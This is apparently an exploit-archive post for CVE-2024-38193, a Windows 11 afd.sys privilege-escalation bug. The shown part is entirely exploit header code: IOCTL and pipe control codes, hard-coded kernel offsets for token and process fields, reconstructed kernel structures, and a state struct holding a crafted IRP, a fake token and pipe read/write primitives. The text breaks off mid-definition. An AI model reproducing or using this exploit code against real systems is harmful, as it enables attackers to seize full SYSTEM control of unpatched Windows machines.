Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation

• CVE-2024-38193

Exploit Title: Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation Date: 2025-05-05 Exploit Author: Milad Karimi (Ex3ptionaL) Contact:…

# Exploit Title: Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation

# Date: 2025-05-05

# Exploit Author: Milad Karimi (Ex3ptionaL)

# Contact: [email protected]

# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL

# Tested on: Win x64

# CVE : CVE-2024-38193

#pragma once

#include “ntstatus.h”

#include “Windows.h”

#include

#pragma comment(lib, “ntdll.lib”)

#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))

#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

#define AfdOpenPacket “AfdOpenPacketXX”

#define AFD_DEVICE_NAME L”\\Device\\Afd”

#define LOCALHOST “127.0.0.1”

#define IOCTL_AFD_BIND 0x12003LL

#define IOCTL_AFD_LISTEN 0x1200BLL

#define IOCTL_AFD_CONNECT 0x120BBLL

#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL

#define FSCTL_PIPE_PEEK 0x11400CLL

#define FSCTL_PIPE_IMPERSONATE 0x11001CLL

#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

#define OBJ_CASE_INSENSITIVE 0x00000040

#define OBJ_INHERIT 0x00000002

#define FILE_OPEN_IF 0x3

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#define OFFSET_IN_TOKEN_VARIABLEPART 0x490

#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40

#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8

#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0

#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8

#define PREVIOUS_MODE_OFFSET 0x232

#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448

#define OFFSET_TO_TOKEN 0x4b8

#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE

typedef struct IO_STATUS_BLOCK

{

union

{

DWORD Status;

PVOID Pointer;

};

DWORD* Information;

};

//0x4 bytes (sizeof)

struct _SYSTEM_POWER_STATE_CONTEXT

{

union

{

struct

{

ULONG Reserved1 : 8; //0x0

ULONG TargetSystemState : 4; //0x0

ULONG EffectiveSystemState : 4; //0x0

ULONG CurrentSystemState : 4; //0x0

ULONG IgnoreHibernationPath : 1; //0x0

ULONG PseudoTransition : 1; //0x0

ULONG KernelSoftReboot : 1; //0x0

ULONG DirectedDripsTransition : 1; //0x0

ULONG Reserved2 : 8; //0x0

};

ULONG ContextAsUlong; //0x0

};

};

//0x4 bytes (sizeof)

union _POWER_STATE

{

enum _SYSTEM_POWER_STATE SystemState; //0x0

enum _DEVICE_POWER_STATE DeviceState; //0x0

};

//0x48 bytes (sizeof)

typedef struct _IO_STACK_LOCATION

{

UCHAR MajorFunction; //0x0

UCHAR MinorFunction; //0x1

UCHAR Flags; //0x2

UCHAR Control; //0x3

union

{

struct

{

struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8

ULONG Options; //0x10

USHORT FileAttributes; //0x18

USHORT ShareAccess; //0x1a

ULONG EaLength; //0x20

} Create; //0x8

struct

{

struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8

ULONG Options; //0x10

USHORT Reserved; //0x18

USHORT ShareAccess; //0x1a

struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20

} CreatePipe; //0x8

struct

{

struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8

ULONG Options; //0x10

USHORT Reserved; //0x18

USHORT ShareAccess; //0x1a

struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20

} CreateMailslot; //0x8

struct

{

ULONG Length; //0x8

ULONG Key; //0x10

ULONG Flags; //0x14

union _LARGE_INTEGER ByteOffset; //0x18

} Read; //0x8

struct

{

ULONG Length; //0x8

ULONG Key; //0x10

ULONG Flags; //0x14

union _LARGE_INTEGER ByteOffset; //0x18

} Write; //0x8

struct

{

ULONG Length; //0x8

struct _UNICODE_STRING* FileName; //0x10

enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18

ULONG FileIndex; //0x20

} QueryDirectory; //0x8

struct

{

ULONG Length; //0x8

ULONG CompletionFilter; //0x10

} NotifyDirectory; //0x8

struct

{

ULONG Length; //0x8

ULONG CompletionFilter; //0x10

enum _DIRECTORY_NOTIFY_INFORMATION_CLASS

DirectoryNotifyInformationClass; //0x18

} NotifyDirectoryEx; //0x8

struct

{

ULONG Length; //0x8

enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10

} QueryFile; //0x8

struct

{

ULONG Length; //0x8

enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10

struct _FILE_OBJECT* FileObject; //0x18

union

{

struct

{

UCHAR ReplaceIfExists; //0x20

UCHAR AdvanceOnly; //0x21

};

ULONG ClusterCount; //0x20

VOID* DeleteHandle; //0x20

};

} SetFile; //0x8

struct

{

ULONG Length; //0x8

VOID* EaList; //0x10

ULONG EaListLength; //0x18

ULONG EaIndex; //0x20

} QueryEa; //0x8

struct

{

ULONG Length; //0x8

} SetEa; //0x8

struct

{

ULONG Length; //0x8

enum _FSINFOCLASS FsInformationClass; //0x10

} QueryVolume; //0x8

struct

{

ULONG Length; //0x8

enum _FSINFOCLASS FsInformationClass; //0x10

} SetVolume; //0x8

struct

{

ULONG OutputBufferLength; //0x8

ULONG InputBufferLength; //0x10

ULONG FsControlCode; //0x18

VOID* Type3InputBuffer; //0x20

} FileSystemControl; //0x8

struct

{

union _LARGE_INTEGER* Length; //0x8

ULONG Key; //0x10

union _LARGE_INTEGER ByteOffset; //0x18

} LockControl; //0x8

struct

{

ULONG OutputBufferLength; //0x8

ULONG InputBufferLength; //0x10

ULONG IoControlCode; //0x18

VOID* Type3InputBuffer; //0x20

} DeviceIoControl; //0x8

struct

{

ULONG SecurityInformation; //0x8

ULONG Length; //0x10

} QuerySecurity; //0x8

struct

{

ULONG SecurityInformation; //0x8

VOID* SecurityDescriptor; //0x10

} SetSecurity; //0x8

struct

{

struct _VPB* Vpb; //0x8

struct _DEVICE_OBJECT* DeviceObject; //0x10

} MountVolume; //0x8

struct

{

struct _VPB* Vpb; //0x8

struct _DEVICE_OBJECT* DeviceObject; //0x10

} VerifyVolume; //0x8

struct

{

struct _SCSI_REQUEST_BLOCK* Srb; //0x8

} Scsi; //0x8

struct

{

ULONG Length; //0x8

VOID* StartSid; //0x10

struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18

ULONG SidListLength; //0x20

} QueryQuota; //0x8

struct

{

ULONG Length; //0x8

} SetQuota; //0x8

struct

{

enum _DEVICE_RELATION_TYPE Type; //0x8

} QueryDeviceRelations; //0x8

struct

{

struct _GUID* InterfaceType; //0x8

USHORT Size; //0x10

USHORT Version; //0x12

struct _INTERFACE* Interface; //0x18

VOID* InterfaceSpecificData; //0x20

} QueryInterface; //0x8

struct

{

struct _DEVICE_CAPABILITIES* Capabilities; //0x8

} DeviceCapabilities; //0x8

struct

{

struct _IO_RESOURCE_REQUIREMENTS_LIST*

IoResourceRequirementList; //0x8

} FilterResourceRequirements; //0x8

struct

{

ULONG WhichSpace; //0x8

VOID* Buffer; //0x10

ULONG Offset; //0x18

ULONG Length; //0x20

} ReadWriteConfig; //0x8

struct

{

UCHAR Lock; //0x8

} SetLock; //0x8

struct

{

enum BUS_QUERY_ID_TYPE IdType; //0x8

} QueryId; //0x8

struct

{

enum DEVICE_TEXT_TYPE DeviceTextType; //0x8

ULONG LocaleId; //0x10

} QueryDeviceText; //0x8

struct

{

UCHAR InPath; //0x8

UCHAR Reserved[3]; //0x9

enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10

} UsageNotification; //0x8

struct

{

enum _SYSTEM_POWER_STATE PowerState; //0x8

} WaitWake; //0x8

struct

{

struct _POWER_SEQUENCE* PowerSequence; //0x8

} PowerSequence; //0x8

struct

{

union

{

ULONG SystemContext; //0x8

struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;

//0x8

};

enum _POWER_STATE_TYPE Type; //0x10

union _POWER_STATE State; //0x18

enum POWER_ACTION ShutdownType; //0x20

} Power; //0x8

struct

{

struct _CM_RESOURCE_LIST* AllocatedResources; //0x8

struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10

} StartDevice; //0x8

struct

{

ULONGLONG ProviderId; //0x8

VOID* DataPath; //0x10

ULONG BufferSize; //0x18

VOID* Buffer; //0x20

} WMI; //0x8

struct

{

VOID* Argument1; //0x8

VOID* Argument2; //0x10

VOID* Argument3; //0x18

VOID* Argument4; //0x20

} Others; //0x8

} Parameters; //0x8

struct _DEVICE_OBJECT* DeviceObject; //0x28

struct _FILE_OBJECT* FileObject; //0x30

LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*

arg2, VOID* arg3); //0x38

VOID* Context; //0x40

}IO_STACK_LOCATION;

//0x18 bytes (sizeof)

struct _KDEVICE_QUEUE_ENTRY

{

struct _LIST_ENTRY DeviceListEntry; //0x0

ULONG SortKey; //0x10

UCHAR Inserted; //0x14

};

//0x58 bytes (sizeof)

struct _KAPC

{

UCHAR Type; //0x0

UCHAR AllFlags; //0x1

UCHAR Size; //0x2

UCHAR SpareByte1; //0x3

ULONG SpareLong0; //0x4

struct _KTHREAD* Thread; //0x8

struct _LIST_ENTRY ApcListEntry; //0x10

VOID* Reserved[3]; //0x20

VOID* NormalContext; //0x38

VOID* SystemArgument1; //0x40

VOID* SystemArgument2; //0x48

CHAR ApcStateIndex; //0x50

CHAR ApcMode; //0x51

UCHAR Inserted; //0x52

};

//0xd0 bytes (sizeof)

struct _IRP

{

SHORT Type; //0x0

USHORT Size; //0x2

USHORT AllocationProcessorNumber; //0x4

USHORT Reserved; //0x6

struct _MDL* MdlAddress; //0x8

ULONG Flags; //0x10

union

{

struct _IRP* MasterIrp; //0x18

LONG IrpCount; //0x18

VOID* SystemBuffer; //0x18

} AssociatedIrp; //0x18

struct _LIST_ENTRY ThreadListEntry; //0x20

struct IO_STATUS_BLOCK IoStatus; //0x30

CHAR RequestorMode; //0x40

UCHAR PendingReturned; //0x41

CHAR StackCount; //0x42

CHAR CurrentLocation; //0x43

UCHAR Cancel; //0x44

UCHAR CancelIrql; //0x45

CHAR ApcEnvironment; //0x46

UCHAR AllocationFlags; //0x47

union

{

struct _IO_STATUS_BLOCK* UserIosb; //0x48

VOID* IoRingContext; //0x48

};

struct _KEVENT* UserEvent; //0x50

union

{

struct

{

union

{

VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*

arg2, ULONG arg3); //0x58

VOID* IssuingProcess; //0x58

};

union

{

VOID* UserApcContext; //0x60

struct _IORING_OBJECT* IoRing; //0x60

};

} AsynchronousParameters; //0x58

union _LARGE_INTEGER AllocationSize; //0x58

} Overlay; //0x58

VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);

//0x68

VOID* UserBuffer; //0x70

union

{

struct

{

union

{

struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78

VOID* DriverContext[4]; //0x78

};

struct _ETHREAD* Thread; //0x98

CHAR* AuxiliaryBuffer; //0xa0

struct _LIST_ENTRY ListEntry; //0xa8

union

{

struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8

ULONG PacketType; //0xb8

};

struct _FILE_OBJECT* OriginalFileObject; //0xc0

VOID* IrpExtension; //0xc8

} Overlay; //0x78

struct _KAPC Apc; //0x78

VOID* CompletionKey; //0x78

} Tail; //0x78

};

typedef struct _TA_ADDRESS

{

USHORT AddressLength;

USHORT AddressType;

UCHAR Address[1];

}TA_ADDRESS;

typedef struct _TRANSPORT_ADDRESS

{

LONG TAAddressCount;

TA_ADDRESS Address[1];

}TRANSPORT_ADDRESS;

typedef struct _UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES

{

ULONG Length;

HANDLE RootDirectory;

PUNICODE_STRING ObjectName;

ULONG Attributes;

PVOID SecurityDescriptor;

PVOID SecurityQualityOfService;

}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _SYSTEM_MODULE_ENTRY

{

HANDLE Section;

PVOID MappedBase;

PVOID ImageBase;

ULONG ImageSize;

ULONG Flags;

USHORT LoadOrderIndex;

USHORT InitOrderIndex;

USHORT LoadCount;

USHORT OffsetToFileName;

UCHAR FullPathName[256];

} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION

{

ULONG Count;

SYSTEM_MODULE_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX

{

PVOID Object;

ULONG_PTR UniqueProcessId;

ULONG_PTR HandleValue;

ULONG GrantedAccess;

USHORT CreatorBackTraceIndex;

USHORT ObjectTypeIndex;

ULONG HandleAttributes;

ULONG Reserved;

} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX

{

ULONG_PTR NumberOfHandles;

ULONG_PTR Reserved;

SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];

} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

typedef struct _AFD_CREATE_PACKET {

//FILE_FULL_EA_INFORMATION

ULONG NextEntryOffset;

WORD Flags;

UCHAR EaNameLength;

USHORT EaValueLength;

CHAR EaName[15];

//AFD_CREATE_PACKET

ULONG EndpointFlags;

ULONG GroupID;

ULONG AddressFamily;

ULONG SocketType;

ULONG Protocol;

ULONG SizeOfTransportName;

wchar_t TransportName[16];

//UCHAR Unkown;

} AFD_CREATE_PACKET;

enum THREADINFOCLASS { ThreadImpersonationToken = 5 };

enum SYSTEM_INFORMATION_CLASS {

SystemModuleInformation = 11,

SystemExtendedHandleInformation = 64

};

typedef enum EVENT_TYPE {

NotificationEvent,

SynchronizationEvent

};

typedef struct _AFD_BIND_DATA {

ULONG ShareType;

SOCKADDR_IN addr;

} AFD_BIND_DATA, * PAFD_BIND_DATA;

typedef struct alignas(16) MY_AFD_CONNECT_INFO

{

__int64 UseSan;

__int64 hNtSock1;

__int64 Unknown;

__int32 tmp6;

WORD const_16;

sockaddr_in bind;

};

typedef struct FAKE_DATA_ENTRY_QUEUE

{

DWORD tmp;

LIST_ENTRY nextQueue;

__int64 unknown;

PVOID security_client_context;

__int64 unknown2;

__int64 sizeOfData;

char DATA[0x77FD0];

};

typedef struct _AFD_LISTEN_INFO {

ULONG unknown;

__int64 MaximumConnectionQueue;

} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;

typedef struct _SECURITY_CLIENT_CONTEXT

{

_SECURITY_QUALITY_OF_SERVICE SecurityQos;

void* ClientToken;

unsigned __int8 DirectlyAccessClientToken;

unsigned __int8 DirectAccessEffectiveOnly;

unsigned __int8 ServerIsRemote;

_TOKEN_CONTROL ClientTokenControl;

}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;

struct __declspec(align(8)) _OWNER_ENTRY

{

unsigned __int64 OwnerThread;

DWORD ___u1;

};

//0x68 bytes (sizeof)

typedef struct _ERESOURCE

{

struct _LIST_ENTRY SystemResourcesList; //0x0

struct _OWNER_ENTRY* OwnerTable; //0x10

SHORT ActiveCount; //0x18

union

{

USHORT Flag; //0x1a

struct

{

UCHAR ReservedLowFlags; //0x1a

UCHAR WaiterPriority; //0x1b

};

};

VOID* SharedWaiters; //0x20

VOID* ExclusiveWaiters; //0x28

struct _OWNER_ENTRY OwnerEntry; //0x30

ULONG ActiveEntries; //0x40

ULONG ContentionCount; //0x44

ULONG NumberOfSharedWaiters; //0x48

ULONG NumberOfExclusiveWaiters; //0x4c

VOID* Reserved2; //0x50

union

{

VOID* Address; //0x58

ULONGLONG CreatorBackTraceIndex; //0x58

};

ULONGLONG SpinLock; //0x60

}ERESOURCE, *PERESOURCE;

//0x8 bytes (sizeof)

typedef struct _EX_PUSH_LOCK

{

union

{

struct

{

ULONGLONG Locked : 1; //0x0

ULONGLONG Waiting : 1; //0x0

ULONGLONG Waking : 1; //0x0

ULONGLONG MultipleShared : 1; //0x0

ULONGLONG Shared : 60; //0x0

};

ULONGLONG Value; //0x0

VOID* Ptr; //0x0

};

};

//0x10 bytes (sizeof)

typedef struct _SEP_CACHED_HANDLES_TABLE

{

struct _EX_PUSH_LOCK Lock; //0x0

struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8

};

//0x8 bytes (sizeof)

typedef struct _EX_RUNDOWN_REF

{

union

{

ULONGLONG Count; //0x0

VOID* Ptr; //0x0

};

};

//0x20 bytes (sizeof)

typedef struct _OB_HANDLE_REVOCATION_BLOCK

{

struct _LIST_ENTRY RevocationInfos; //0x0

struct _EX_PUSH_LOCK Lock; //0x10

struct _EX_RUNDOWN_REF Rundown; //0x18

};

//0xc0 bytes (sizeof)

typedef struct _SEP_LOGON_SESSION_REFERENCES

{

struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0

struct _LUID LogonId; //0x8

struct _LUID BuddyLogonId; //0x10

LONGLONG ReferenceCount; //0x18

ULONG Flags; //0x20

struct _DEVICE_MAP* pDeviceMap; //0x28

VOID* Token; //0x30

struct _UNICODE_STRING AccountName; //0x38

struct _UNICODE_STRING AuthorityName; //0x48

struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58

struct _EX_PUSH_LOCK SharedDataLock; //0x68

struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;

//0x70

struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78

struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80

struct _EJOB* ServerSilo; //0xa0

struct _LUID SiblingAuthId; //0xa8

struct _LIST_ENTRY TokenList; //0xb0

};

//0x30 bytes (sizeof)

typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION

{

ULONG SecurityAttributeCount; //0x0

struct _LIST_ENTRY SecurityAttributesList; //0x8

ULONG WorkingSecurityAttributeCount; //0x18

struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20

}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;

//0x20 bytes (sizeof)

typedef struct _SEP_SID_VALUES_BLOCK

{

ULONG BlockLength; //0x0

LONGLONG ReferenceCount; //0x8

ULONG SidCount; //0x10

ULONGLONG SidValuesStart; //0x18

}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;

//0x18 bytes (sizeof)

struct _SEP_TOKEN_PRIVILEGES

{

ULONGLONG Present; //0x0

ULONGLONG Enabled; //0x8

ULONGLONG EnabledByDefault; //0x10

};

//0x1f bytes (sizeof)

struct _SEP_AUDIT_POLICY

{

struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0

UCHAR PolicySetStatus; //0x1e

};

//0x498 bytes (sizeof)

struct _TOKEN

{

struct _TOKEN_SOURCE TokenSource; //0x0

struct _LUID TokenId; //0x10

struct _LUID AuthenticationId; //0x18

struct _LUID ParentTokenId; //0x20

union _LARGE_INTEGER ExpirationTime; //0x28

struct _ERESOURCE* TokenLock; //0x30

struct _LUID ModifiedId; //0x38

struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40

struct _SEP_AUDIT_POLICY AuditPolicy; //0x58

ULONG SessionId; //0x78

ULONG UserAndGroupCount; //0x7c

ULONG RestrictedSidCount; //0x80

ULONG VariableLength; //0x84

ULONG DynamicCharged; //0x88

ULONG DynamicAvailable; //0x8c

ULONG DefaultOwnerIndex; //0x90

struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98

struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0

VOID* PrimaryGroup; //0xa8

ULONG* DynamicPart; //0xb0

struct _ACL* DefaultDacl; //0xb8

enum _TOKEN_TYPE TokenType; //0xc0

enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4

ULONG TokenFlags; //0xc8

UCHAR TokenInUse; //0xcc

ULONG IntegrityLevelIndex; //0xd0

ULONG MandatoryPolicy; //0xd4

void* LogonSession; //0xd8

struct _LUID OriginatingLogonSession; //0xe0

struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8

struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8

struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*

pSecurityAttributes; //0x308

VOID* Package; //0x310

struct _SID_AND_ATTRIBUTES* Capabilities; //0x318

ULONG CapabilityCount; //0x320

struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328

struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438

struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440

struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;

//0x448

VOID* TrustLevelSid; //0x450

struct _TOKEN* TrustLinkedToken; //0x458

VOID* IntegrityLevelSidValue; //0x460

struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468

struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470

struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478

struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480

VOID* SessionObject; //0x488

ULONGLONG VariablePart; //0x490

};

//0x38 bytes (sizeof)

struct _OBJECT_HEADER

{

LONGLONG PointerCount; //0x0

union

{

LONGLONG HandleCount; //0x8

VOID* NextToFree; //0x8

};

struct _EX_PUSH_LOCK Lock; //0x10

UCHAR TypeIndex; //0x18

union

{

UCHAR TraceFlags; //0x19

struct

{

UCHAR DbgRefTrace : 1; //0x19

UCHAR DbgTracePermanent : 1; //0x19

};

};

UCHAR InfoMask; //0x1a

union

{

UCHAR Flags; //0x1b

struct

{

UCHAR NewObject : 1; //0x1b

UCHAR KernelObject : 1; //0x1b

UCHAR KernelOnlyAccess : 1; //0x1b

UCHAR ExclusiveObject : 1; //0x1b

UCHAR PermanentObject : 1; //0x1b

UCHAR DefaultSecurityQuota : 1; //0x1b

UCHAR SingleHandleEntry : 1; //0x1b

UCHAR DeletedInline : 1; //0x1b

};

};

ULONG Reserved; //0x1c

union

{

struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20

VOID* QuotaBlockCharged; //0x20

};

VOID* SecurityDescriptor; //0x28

struct _TOKEN Body; //0x30

};

struct mm {

void* fake_data_entry;

void* input;

_IRP* crafted_irp;

IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;

void* p_mem_0x30;

void* p_mem_0xD0_2;

_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;

ACL* VariablePartDefaultDacl;

ACL* VariablePartDefaultDacl2;

_ERESOURCE* TokenLock;

void* PrimaryGroup;

int sizeOfClientTokenAndObjectHeader;

PSEP_SID_VALUES_BLOCK TokenSidValues;

_SECURITY_CLIENT_CONTEXT* security_client_context;

_SEP_LOGON_SESSION_REFERENCES* LogonSession;

_TOKEN* fakeToken;

void *pipe_100_im_control_block;

void* pipe_100_rw_control_block;

void* p_mem_Pipe_hToPipe_1000_rw;

void* p_mem_Pipe_hToPipe_1000_rw_2;

HANDLE hPipeIM;

HANDLE hPipeRW;

HANDLE hFileIM;

HANDLE hFileRW;

HANDLE IncPrimitiveTOKEN;

HANDLE RWPrimitiveTOKEN;

};

//0x18 bytes (sizeof)

struct _DISPATCHER_HEADER

{

union

{

volatile LONG Lock; //0x0

LONG LockNV; //0x0

struct

{

UCHAR Type; //0x0

UCHAR Signalling; //0x1

UCHAR Size; //0x2

UCHAR Reserved1; //0x3

};

struct

{

UCHAR TimerType; //0x0

union

{

UCHAR TimerControlFlags; //0x1

struct

{

UCHAR Absolute : 1;